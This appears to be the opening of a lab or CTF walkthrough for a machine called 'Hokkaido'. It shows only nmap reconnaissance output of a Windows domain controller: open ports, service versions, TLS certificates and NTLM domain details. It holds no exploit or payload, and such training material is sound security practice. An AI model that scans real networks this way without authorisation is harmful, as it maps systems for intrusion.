Machine Information
- Machine Name: Hokkaido
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
Nmap scan report for 192.168.135.40
Host is up, received user-set (0.029s latency).
Scanned at 2024-10-19 13:02:47 +08 for 542s
Not shown: 65502 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 125
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-19 05:03:12Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA/domainComponent=hokkaido-aerospace
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
| SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
| -----BEGIN CERTIFICATE-----
| MIIGezCCBWOgAwIBAgITPwAAAAPhP3tkfsq+JgAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBcMRMwEQYKCZImiZPyLGQBGRYDY29tMSIwIAYKCZImiZPyLGQBGRYSaG9ra2Fp
| ZG8tYWVyb3NwYWNlMSEwHwYDVQQDExhob2trYWlkby1hZXJvc3BhY2UtREMtQ0Ew
| HhcNMjMxMjA3MTM1NDE4WhcNMjQxMjA2MTM1NDE4WjAkMSIwIAYDVQQDExlkYy5o
| b2trYWlkby1hZXJvc3BhY2UuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
| CgKCAQEAv2jnkedpj5N66PAq7NSEud8/oITQ+YmbAdeaumlLO6moPVRDiruZ2QnB
| Ht3Tqy0LezxL52WwspgkK71OUDsTqLvmszyy26rg7DcTZ0t5rWFD19QvT5BOKDMY
| SIPi4/aFj/s1pj/rDxMeRbVqRIFlpPX/k19xGCbJKhpHPbmHzKcwO4SmpBgdPjfu
| YpWxxo9bEk5JwYhG2+b2G9VkQBsV0BITUqyDA4BhESAJ0ALIdA2wrpuF3u1NrojP
| vJGDUTCRhgSoofiFncjZslUr4USQJHbRPy7qKVrZGkyCf+8F5ubnrrcGgr9NNzDD
| 9Wc8QryO5pAg5/T3ZsUlrJ13JkGE1QIDAQABo4IDbDCCA2gwLwYJKwYBBAGCNxQC
| BCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQG
| CCsGAQUFBwMCBggrBgEFBQcDATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkP
| BGswaTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQB
| KjALBglghkgBZQMEAS0wCwYJYIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMC
| BzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUZG1M361oXtNAt/JE0xFnowVbRwowHwYD
| VR0jBBgwFoAUO3GDfJd+M4g9RXjy4dZ42J5MKa0wgdwGA1UdHwSB1DCB0TCBzqCB
| y6CByIaBxWxkYXA6Ly8vQ049aG9ra2FpZG8tYWVyb3NwYWNlLURDLUNBLENOPWRj
| LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPWhva2thaWRvLWFlcm9zcGFjZSxEQz1jb20/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHVBggrBgEFBQcBAQSByDCBxTCBwgYIKwYBBQUHMAKGgbVs
| ZGFwOi8vL0NOPWhva2thaWRvLWFlcm9zcGFjZS1EQy1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1ob2trYWlkby1hZXJvc3BhY2UsREM9Y29tP2NBQ2VydGlmaWNhdGU/YmFz
| ZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MEUGA1UdEQQ+MDyg
| HwYJKwYBBAGCNxkBoBIEEHPAV/nQryFLm5ZKYfkmFISCGWRjLmhva2thaWRvLWFl
| cm9zcGFjZS5jb20wTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMt
| MS01LTIxLTMyMjcyOTY5MTQtOTc0NzgwMjA0LTEzMjU5NDE0OTctMTAwMDANBgkq
| hkiG9w0BAQsFAAOCAQEABIf9JwiyBrOL8vv2Z5mlgdls7P31U9lCdslCFI6qVQRd
| n5jMCh0fgth7Nw9q2X530oSQp3qEUplkRu9crwlSUWsBjpTTQv2PHUNIfOwxDPdh
| q2SexJ0XDS7aQChR+S8umvO3NVpxjz7nCzQvA0WRZp/XnQM6ZN48bADNCz3YnXEI
| UoTWxsHCHs3keJrivLB6H3n0A6W0aukQD1gUwWn6XOEoKQc8/t+oynEQsgyMMDtz
| bUrdbBtPacyPeDrePMDVZa+M9pl2fgN15uRLzIURONen7RWy05JUDHxPz6ikXeK9
| 9AXSUiwCYOlsgK3ti7/MWo08UL83g7/SNQhlIKKmcw==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA/domainComponent=hokkaido-aerospace
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
| SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
| -----BEGIN CERTIFICATE-----
| MIIGezCCBWOgAwIBAgITPwAAAAPhP3tkfsq+JgAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBcMRMwEQYKCZImiZPyLGQBGRYDY29tMSIwIAYKCZImiZPyLGQBGRYSaG9ra2Fp
| ZG8tYWVyb3NwYWNlMSEwHwYDVQQDExhob2trYWlkby1hZXJvc3BhY2UtREMtQ0Ew
| HhcNMjMxMjA3MTM1NDE4WhcNMjQxMjA2MTM1NDE4WjAkMSIwIAYDVQQDExlkYy5o
| b2trYWlkby1hZXJvc3BhY2UuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
| CgKCAQEAv2jnkedpj5N66PAq7NSEud8/oITQ+YmbAdeaumlLO6moPVRDiruZ2QnB
| Ht3Tqy0LezxL52WwspgkK71OUDsTqLvmszyy26rg7DcTZ0t5rWFD19QvT5BOKDMY
| SIPi4/aFj/s1pj/rDxMeRbVqRIFlpPX/k19xGCbJKhpHPbmHzKcwO4SmpBgdPjfu
| YpWxxo9bEk5JwYhG2+b2G9VkQBsV0BITUqyDA4BhESAJ0ALIdA2wrpuF3u1NrojP
| vJGDUTCRhgSoofiFncjZslUr4USQJHbRPy7qKVrZGkyCf+8F5ubnrrcGgr9NNzDD
| 9Wc8QryO5pAg5/T3ZsUlrJ13JkGE1QIDAQABo4IDbDCCA2gwLwYJKwYBBAGCNxQC
| BCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQG
| CCsGAQUFBwMCBggrBgEFBQcDATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkP
| BGswaTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQB
| KjALBglghkgBZQMEAS0wCwYJYIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMC
| BzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUZG1M361oXtNAt/JE0xFnowVbRwowHwYD
| VR0jBBgwFoAUO3GDfJd+M4g9RXjy4dZ42J5MKa0wgdwGA1UdHwSB1DCB0TCBzqCB
| y6CByIaBxWxkYXA6Ly8vQ049aG9ra2FpZG8tYWVyb3NwYWNlLURDLUNBLENOPWRj
| LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPWhva2thaWRvLWFlcm9zcGFjZSxEQz1jb20/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHVBggrBgEFBQcBAQSByDCBxTCBwgYIKwYBBQUHMAKGgbVs
| ZGFwOi8vL0NOPWhva2thaWRvLWFlcm9zcGFjZS1EQy1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1ob2trYWlkby1hZXJvc3BhY2UsREM9Y29tP2NBQ2VydGlmaWNhdGU/YmFz
| ZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MEUGA1UdEQQ+MDyg
| HwYJKwYBBAGCNxkBoBIEEHPAV/nQryFLm5ZKYfkmFISCGWRjLmhva2thaWRvLWFl
| cm9zcGFjZS5jb20wTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMt
| MS01LTIxLTMyMjcyOTY5MTQtOTc0NzgwMjA0LTEzMjU5NDE0OTctMTAwMDANBgkq
| hkiG9w0BAQsFAAOCAQEABIf9JwiyBrOL8vv2Z5mlgdls7P31U9lCdslCFI6qVQRd
| n5jMCh0fgth7Nw9q2X530oSQp3qEUplkRu9crwlSUWsBjpTTQv2PHUNIfOwxDPdh
| q2SexJ0XDS7aQChR+S8umvO3NVpxjz7nCzQvA0WRZp/XnQM6ZN48bADNCz3YnXEI
| UoTWxsHCHs3keJrivLB6H3n0A6W0aukQD1gUwWn6XOEoKQc8/t+oynEQsgyMMDtz
| bUrdbBtPacyPeDrePMDVZa+M9pl2fgN15uRLzIURONen7RWy05JUDHxPz6ikXeK9
| 9AXSUiwCYOlsgK3ti7/MWo08UL83g7/SNQhlIKKmcw==
|_-----END CERTIFICATE-----
1433/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-10-19T05:11:47+00:00; -1s from scanner time.
| ms-sql-ntlm-info:
| 192.168.135.40:1433:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
| SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQLhWUI307A4ROtwMgh+8WuDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwODAyMDIxMzU0WhgPMjA1NDA4MDIwMjEzNTRaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJOM/LlJ
| n7WRALHhPH9JpPOUCprXzepna4LoyPFu7jf3ndos/OXkWEmhJXWbOmRgoBg+MYb9
| FcoA6cdcPQYVQMQ9sYIm9RnlwnpYHzdBCamVX9GEOcB7g05fJED+IDzZyIZSlvRb
| BJfUOJsHC47hkZuDSM8pucGG4aYwrLrqmH59xt4FfHnneSa7FIE0UTrtDQHuEiAa
| rmTSdS5VotclR99upSYGnySGgxeE4rojdz6RoCZO7MfVRKxuq2jzwyAw4KTrbDb5
| innLtClsPryZwnT/xwxY6JUmA2i9/0GKM9bphQXu4eWC23fhCh+Ej1lLeB1x6duS
| 0OcUD9ViEIaAIX0CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAHbiMlU++aiHToJuF
| ECtOjqW4vlEq9VKI57Q1CtsFfCxTsY4fSnS+0lylxOReAfU6GnXaIkAq1VSEml7r
| RBo6bYWxYwDWrmy4RoHBHzE2DKYfq8x7i09uDQ3E2ndWE83k2wbyJ6aXMld120D7
| 73S1hCFppHJwqBqjvOFr+HePxMG8XT4YXZvFjtgiL2cvPoAc4swU1VlMeFfPRrve
| 6D442eQMd+tVckMrS/3p9AavbUGwwyFUDgPS2pp3e4A/pQdPMN91gvoVaguWKY4J
| lAbWPCd5UKPsIz3QS/lXivFtCLBSkxsqlM6/dF1mIMfHMECyxL4esBifdGqYcnt5
| p9exOQ==
|_-----END CERTIFICATE-----
| ms-sql-info:
| 192.168.135.40:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA/domainComponent=hokkaido-aerospace
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
| SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
| -----BEGIN CERTIFICATE-----
| MIIGezCCBWOgAwIBAgITPwAAAAPhP3tkfsq+JgAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBcMRMwEQYKCZImiZPyLGQBGRYDY29tMSIwIAYKCZImiZPyLGQBGRYSaG9ra2Fp
| ZG8tYWVyb3NwYWNlMSEwHwYDVQQDExhob2trYWlkby1hZXJvc3BhY2UtREMtQ0Ew
| HhcNMjMxMjA3MTM1NDE4WhcNMjQxMjA2MTM1NDE4WjAkMSIwIAYDVQQDExlkYy5o
| b2trYWlkby1hZXJvc3BhY2UuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
| CgKCAQEAv2jnkedpj5N66PAq7NSEud8/oITQ+YmbAdeaumlLO6moPVRDiruZ2QnB
| Ht3Tqy0LezxL52WwspgkK71OUDsTqLvmszyy26rg7DcTZ0t5rWFD19QvT5BOKDMY
| SIPi4/aFj/s1pj/rDxMeRbVqRIFlpPX/k19xGCbJKhpHPbmHzKcwO4SmpBgdPjfu
| YpWxxo9bEk5JwYhG2+b2G9VkQBsV0BITUqyDA4BhESAJ0ALIdA2wrpuF3u1NrojP
| vJGDUTCRhgSoofiFncjZslUr4USQJHbRPy7qKVrZGkyCf+8F5ubnrrcGgr9NNzDD
| 9Wc8QryO5pAg5/T3ZsUlrJ13JkGE1QIDAQABo4IDbDCCA2gwLwYJKwYBBAGCNxQC
| BCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQG
| CCsGAQUFBwMCBggrBgEFBQcDATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkP
| BGswaTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQB
| KjALBglghkgBZQMEAS0wCwYJYIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMC
| BzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUZG1M361oXtNAt/JE0xFnowVbRwowHwYD
| VR0jBBgwFoAUO3GDfJd+M4g9RXjy4dZ42J5MKa0wgdwGA1UdHwSB1DCB0TCBzqCB
| y6CByIaBxWxkYXA6Ly8vQ049aG9ra2FpZG8tYWVyb3NwYWNlLURDLUNBLENOPWRj
| LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPWhva2thaWRvLWFlcm9zcGFjZSxEQz1jb20/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHVBggrBgEFBQcBAQSByDCBxTCBwgYIKwYBBQUHMAKGgbVs
| ZGFwOi8vL0NOPWhva2thaWRvLWFlcm9zcGFjZS1EQy1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1ob2trYWlkby1hZXJvc3BhY2UsREM9Y29tP2NBQ2VydGlmaWNhdGU/YmFz
| ZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MEUGA1UdEQQ+MDyg
| HwYJKwYBBAGCNxkBoBIEEHPAV/nQryFLm5ZKYfkmFISCGWRjLmhva2thaWRvLWFl
| cm9zcGFjZS5jb20wTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMt
| MS01LTIxLTMyMjcyOTY5MTQtOTc0NzgwMjA0LTEzMjU5NDE0OTctMTAwMDANBgkq
| hkiG9w0BAQsFAAOCAQEABIf9JwiyBrOL8vv2Z5mlgdls7P31U9lCdslCFI6qVQRd
| n5jMCh0fgth7Nw9q2X530oSQp3qEUplkRu9crwlSUWsBjpTTQv2PHUNIfOwxDPdh
| q2SexJ0XDS7aQChR+S8umvO3NVpxjz7nCzQvA0WRZp/XnQM6ZN48bADNCz3YnXEI
| UoTWxsHCHs3keJrivLB6H3n0A6W0aukQD1gUwWn6XOEoKQc8/t+oynEQsgyMMDtz
| bUrdbBtPacyPeDrePMDVZa+M9pl2fgN15uRLzIURONen7RWy05JUDHxPz6ikXeK9
| 9AXSUiwCYOlsgK3ti7/MWo08UL83g7/SNQhlIKKmcw==
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA/domainComponent=hokkaido-aerospace
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
| SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
| -----BEGIN CERTIFICATE-----
| MIIGezCCBWOgAwIBAgITPwAAAAPhP3tkfsq+JgAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBcMRMwEQYKCZImiZPyLGQBGRYDY29tMSIwIAYKCZImiZPyLGQBGRYSaG9ra2Fp
| ZG8tYWVyb3NwYWNlMSEwHwYDVQQDExhob2trYWlkby1hZXJvc3BhY2UtREMtQ0Ew
| HhcNMjMxMjA3MTM1NDE4WhcNMjQxMjA2MTM1NDE4WjAkMSIwIAYDVQQDExlkYy5o
| b2trYWlkby1hZXJvc3BhY2UuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
| CgKCAQEAv2jnkedpj5N66PAq7NSEud8/oITQ+YmbAdeaumlLO6moPVRDiruZ2QnB
| Ht3Tqy0LezxL52WwspgkK71OUDsTqLvmszyy26rg7DcTZ0t5rWFD19QvT5BOKDMY
| SIPi4/aFj/s1pj/rDxMeRbVqRIFlpPX/k19xGCbJKhpHPbmHzKcwO4SmpBgdPjfu
| YpWxxo9bEk5JwYhG2+b2G9VkQBsV0BITUqyDA4BhESAJ0ALIdA2wrpuF3u1NrojP
| vJGDUTCRhgSoofiFncjZslUr4USQJHbRPy7qKVrZGkyCf+8F5ubnrrcGgr9NNzDD
| 9Wc8QryO5pAg5/T3ZsUlrJ13JkGE1QIDAQABo4IDbDCCA2gwLwYJKwYBBAGCNxQC
| BCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQG
| CCsGAQUFBwMCBggrBgEFBQcDATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkP
| BGswaTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQB
| KjALBglghkgBZQMEAS0wCwYJYIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMC
| BzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUZG1M361oXtNAt/JE0xFnowVbRwowHwYD
| VR0jBBgwFoAUO3GDfJd+M4g9RXjy4dZ42J5MKa0wgdwGA1UdHwSB1DCB0TCBzqCB
| y6CByIaBxWxkYXA6Ly8vQ049aG9ra2FpZG8tYWVyb3NwYWNlLURDLUNBLENOPWRj
| LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPWhva2thaWRvLWFlcm9zcGFjZSxEQz1jb20/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHVBggrBgEFBQcBAQSByDCBxTCBwgYIKwYBBQUHMAKGgbVs
| ZGFwOi8vL0NOPWhva2thaWRvLWFlcm9zcGFjZS1EQy1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1ob2trYWlkby1hZXJvc3BhY2UsREM9Y29tP2NBQ2VydGlmaWNhdGU/YmFz
| ZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MEUGA1UdEQQ+MDyg
| HwYJKwYBBAGCNxkBoBIEEHPAV/nQryFLm5ZKYfkmFISCGWRjLmhva2thaWRvLWFl
| cm9zcGFjZS5jb20wTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMt
| MS01LTIxLTMyMjcyOTY5MTQtOTc0NzgwMjA0LTEzMjU5NDE0OTctMTAwMDANBgkq
| hkiG9w0BAQsFAAOCAQEABIf9JwiyBrOL8vv2Z5mlgdls7P31U9lCdslCFI6qVQRd
| n5jMCh0fgth7Nw9q2X530oSQp3qEUplkRu9crwlSUWsBjpTTQv2PHUNIfOwxDPdh
| q2SexJ0XDS7aQChR+S8umvO3NVpxjz7nCzQvA0WRZp/XnQM6ZN48bADNCz3YnXEI
| UoTWxsHCHs3keJrivLB6H3n0A6W0aukQD1gUwWn6XOEoKQc8/t+oynEQsgyMMDtz
| bUrdbBtPacyPeDrePMDVZa+M9pl2fgN15uRLzIURONen7RWy05JUDHxPz6ikXeK9
| 9AXSUiwCYOlsgK3ti7/MWo08UL83g7/SNQhlIKKmcw==
|_-----END CERTIFICATE-----
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2024-10-19T05:11:47+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Issuer: commonName=dc.hokkaido-aerospace.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-01T02:13:36
| Not valid after: 2025-01-31T02:13:36
| MD5: 19e7:3538:6f5e:0a49:0192:1363:cba9:a224
| SHA-1: b3b9:d742:1c06:70dd:c0f8:db08:7807:8ae1:ab54:92bc
| -----BEGIN CERTIFICATE-----
| MIIC9jCCAd6gAwIBAgIQNWjfKMRHD75AYllsMgEzVjANBgkqhkiG9w0BAQsFADAk
| MSIwIAYDVQQDExlkYy5ob2trYWlkby1hZXJvc3BhY2UuY29tMB4XDTI0MDgwMTAy
| MTMzNloXDTI1MDEzMTAyMTMzNlowJDEiMCAGA1UEAxMZZGMuaG9ra2FpZG8tYWVy
| b3NwYWNlLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMar390g
| xY/7PpGkiA/qwgY19xls/XQu2B26aGsv0eEcoNcr5NMCkrN4z48NBoIAkwq7HvEX
| RRyc0jc+ZvsP1pZQwRLAjm58a5LIBh88PTNqUnGohd7+V52pqk3im8z1vj+qs6OE
| Tl03KBZwOnCRKFOYYvsI+S6CL5nwSwLZ6sxZuFpokxVE410b8iJzA5sUtzH7OrmL
| w3M1xlKrz4ayaKeWkMRW/1ENaiaFlfwvALGrST5Nb3Kx/d8vtS2d+R/1IbNuYNit
| R+Stj+G0n1ZhiO0GPhWi74PB0/gG+HkmsP60gb7Ec0XY8Hqa89X+phqaO05lGpn5
| 7q9ndZ6ckZVuuakCAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0P
| BAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IBAQBta2xdGJEOPouL1UVnIyBWzJhHxnB9
| gAaTtMWvPA88YZb69F33RkyaHrPi51PohC9Mf9q63wU3EDajozcfY7lUkB1GQtKX
| vWkyOMJKzSLS84PEGOVv5YShOwoiQNGIXlU4Bk79Bf/P4pIkGXhT7JG8k3RfG4Ru
| oa+TJDgjFvY8LVV71jUAIciuDDooB+EOfPrFzSGLqqPO1erN+qfK5qyP3SwSta9w
| kbTMsr52OEUhuwN7tL3vc0Co4TOk6JkT7795IZN6VQAPmJc4zwXXKUysqcgf+Cim
| TDdXLVMiBOWCEz4z04T3Z0Z8t2qK3stWNmR2G/ObLkIMtVuD7kBxxLW0
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-19T05:11:32+00:00
